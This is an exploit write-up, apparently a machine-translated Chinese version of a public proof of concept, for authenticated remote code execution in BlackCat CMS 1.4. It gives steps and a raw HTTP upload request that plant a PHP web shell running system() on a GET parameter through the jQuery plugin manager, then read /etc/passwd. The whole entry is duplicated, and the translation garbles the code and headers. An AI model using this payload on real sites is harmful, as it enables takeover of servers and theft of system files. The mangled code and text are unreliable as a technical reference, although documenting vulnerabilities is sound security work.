利用标题: BlackCat CMS V1.4-远程代码执行(RCE)
Application: BlackCat CMS
版本: V1.4
BUGS: RCE
Technology: php
供应商URL: https://blackcat-cms.org/
软件link: https://github.com/blackcatdevelopment/blackcatcms
发现的日期: 13.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录以作为管理员的帐户
2。转到Admin-Tools=jQuery插件(http://localhost/blackCatcms-1.4/upload/backend/backend/admintools/tool.php?tool=jquery_plugin_mgr)
3。上传zip文件,但此邮政编码必须包含poc.php
poc.php文件内容
?php $ a=$ _ get ['code'];回声系统($ a);
4.到达http://localhost/blackcatcms-1.4/upload/lib_jquery/plugins/plagin/poc/poc.php?code=cat%20/etc/passwd
POC请求
POST/BLACKCATCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr http/1.1
HOST: LOCALHOST
内容长度: 577
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundarybrbyjww3cushocbt
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/blackcatcms-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: cat7288SessionID=7UV7F4KJ7HM9Q6JND6M9M9LUQ0TI
连接:关闭
------ webkitformboundarybrbyjww3cushocbt
content-disposition: form-data;名称='上传'
1
------ webkitformboundarybrbyjww3cushocbt
content-disposition: form-data; name='userfile';文件名='poc.zip'
content-type:应用程序/zip
pkvalsdalsfapoc.php?php
$ a=$ _ get ['code'];
回声系统($ a);
?
blabalabalpoalpoc.php
Blablabla
------ webkitformboundarybrbyjww3cushocbt
content-disposition: form-data;名称='提交'
上传
------ webkitformboundarybrbyjww3cushocbt--
Application: BlackCat CMS
版本: V1.4
BUGS: RCE
Technology: php
供应商URL: https://blackcat-cms.org/
软件link: https://github.com/blackcatdevelopment/blackcatcms
发现的日期: 13.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录以作为管理员的帐户
2。转到Admin-Tools=jQuery插件(http://localhost/blackCatcms-1.4/upload/backend/backend/admintools/tool.php?tool=jquery_plugin_mgr)
3。上传zip文件,但此邮政编码必须包含poc.php
poc.php文件内容
?php $ a=$ _ get ['code'];回声系统($ a);
4.到达http://localhost/blackcatcms-1.4/upload/lib_jquery/plugins/plagin/poc/poc.php?code=cat%20/etc/passwd
POC请求
POST/BLACKCATCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr http/1.1
HOST: LOCALHOST
内容长度: 577
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundarybrbyjww3cushocbt
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/blackcatcms-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: cat7288SessionID=7UV7F4KJ7HM9Q6JND6M9M9LUQ0TI
连接:关闭
------ webkitformboundarybrbyjww3cushocbt
content-disposition: form-data;名称='上传'
1
------ webkitformboundarybrbyjww3cushocbt
content-disposition: form-data; name='userfile';文件名='poc.zip'
content-type:应用程序/zip
pkvalsdalsfapoc.php?php
$ a=$ _ get ['code'];
回声系统($ a);
?
blabalabalpoalpoc.php
Blablabla
------ webkitformboundarybrbyjww3cushocbt
content-disposition: form-data;名称='提交'
上传
------ webkitformboundarybrbyjww3cushocbt--
